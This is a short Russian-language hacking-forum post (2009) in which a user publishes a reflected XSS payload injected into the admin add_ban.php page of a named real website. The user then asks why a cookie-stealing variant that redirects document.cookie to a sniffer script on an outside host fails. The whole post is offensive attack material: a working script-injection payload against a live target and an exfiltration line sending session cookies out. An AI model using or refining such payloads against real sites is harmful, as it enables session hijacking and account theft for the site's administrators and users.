Показать сообщение отдельно

  #5  
Старый 03.12.2009, 16:05
svesve
Постоянный
Регистрация: 15.06.2007
Сообщений: 527
С нами: 9950786

Репутация: 214


По умолчанию

http://bans.eqline.ru/admin/add_ban.php/"><script>alert(document.cookie)</script>

если будем засылть на сниффер
типа document.location.href="http://site/sniff.php?"+document.cookie;
то XSS не отрабатывет, убираем ? и все ок,но не то ))))

в чем проблема?
 
Ответить с цитированием